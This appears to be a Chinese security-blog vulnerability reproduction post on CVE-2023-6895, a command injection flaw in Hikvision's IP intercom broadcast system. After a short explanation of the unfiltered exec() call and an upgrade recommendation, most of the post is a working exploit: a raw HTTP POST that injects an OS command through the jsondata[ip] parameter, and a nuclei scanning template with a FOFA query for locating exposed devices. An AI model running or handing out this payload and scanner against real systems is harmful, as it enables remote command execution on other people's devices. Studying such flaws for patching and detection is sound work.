海康威视IP网络对讲广播系统3.0.3_20201113_RELEASE(HIK)中发现了漏洞。它被宣布为危急状态。此漏洞影响文件/php/ping. php的未知代码。使用输入netstat -ano操作参数jsondata[ip]会导致os命令注入。升级到4.1.0版本可以解决这个问题。建议升级受影响的组件。
分析源码发现
$postData = $_POST['jsondata']; 获取了来自POST请求中名为 ‘jsondata’ 的数据
在 systemopr() 函数中,根据传入的参数执行了系统命令,但没有对这些参数进行验证过滤
当$type不等0或1时,会被直接带入exec()执行系统命令
POST /php/ping.php HTTP/1.1
Host: xxx
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.139 Safari/537.36
X-Requested-With: XMLHttpRequest
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 38
jsondata[type]=night&jsondata[ip]=ipconfig
id: cve-2023-6895-Hikvision-spon-rce
info:
name: CVE-2023-6895-海康威视对讲广播系统远程命令执行漏洞
author: YGnight
severity: high
description: description
reference:
- https://
metadata:
verified: true
max-request: 1
fofa-query: icon_hash="-1830859634"
tags: Hikvision,rce,high
requests:
- raw:
- |-
POST /php/ping.php HTTP/1.1
Host: {{Hostname}}
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.139 Safari/537.36
X-Requested-With: XMLHttpRequest
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 38
jsondata[type]=night&jsondata[ip]=ipconfig
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- 'IPv4'
原文始发于微信公众号(night安全):【漏洞复现】海康威视IP网络对讲广播系统存在命令注入漏洞
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论